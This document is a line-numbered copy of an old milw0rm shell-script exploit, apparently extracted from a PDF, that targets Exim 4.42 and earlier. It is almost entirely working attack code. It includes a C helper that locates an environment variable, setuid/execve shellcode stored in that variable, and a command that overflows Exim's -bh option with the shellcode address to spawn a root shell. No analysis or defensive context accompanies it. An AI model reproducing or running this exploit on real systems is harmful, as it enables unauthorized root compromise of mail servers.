Exim 4.42 Local Root Exploit.pdf

1 #!/bin/sh 2 3 # Local Lame R00T sploit for exim <= 4.42 4 # by Dark Eagle 5 # 6 # My First Coding Release In bash )) 7 8 # Unl0ck Research Team 9 # 10 # More Effective than C−code. 11 # 12 # @env.c content: 13 # 14 ################################################### 15 # #include <stdio.h> 16 # #include <string.h> 17 # int main(int argc, char *argv[]) 18 # { 19 # char *addr_ptr; 20 # addr_ptr = getenv(argv[1]); 21 # printf("%s @ %p\n", argv[1], addr_ptr); 22 # return 0; 23 # } 24 ################################################### 25 26 gcc @env.c −o @env 27 28 cp @env /usr/bin 29 cd /usr/exim/bin 30 31 CODE=‘perl −e ’print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 32 \x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"’‘;export CODE 33 34 @env CODE 35 echo "So, dude, starting..." 36 echo "NoW Just Type Address Of CODE" 37 38 read ADDRESS 39 40 echo "You are typed: $ADDRESS" 41 42 echo "Leeeeeeeeeeeeet’sssssssssss g000000000000000!!!!!!!!!" 43 44 ./exim −bh ::%A‘perl −e ’print pack(’L’,’$ADDRESS’) x 256’‘ 45 46 # milw0rm.com [2005−02−07] Page 1/1 Exim 4.42 Local Root Exploit darkeagle 02/07/2005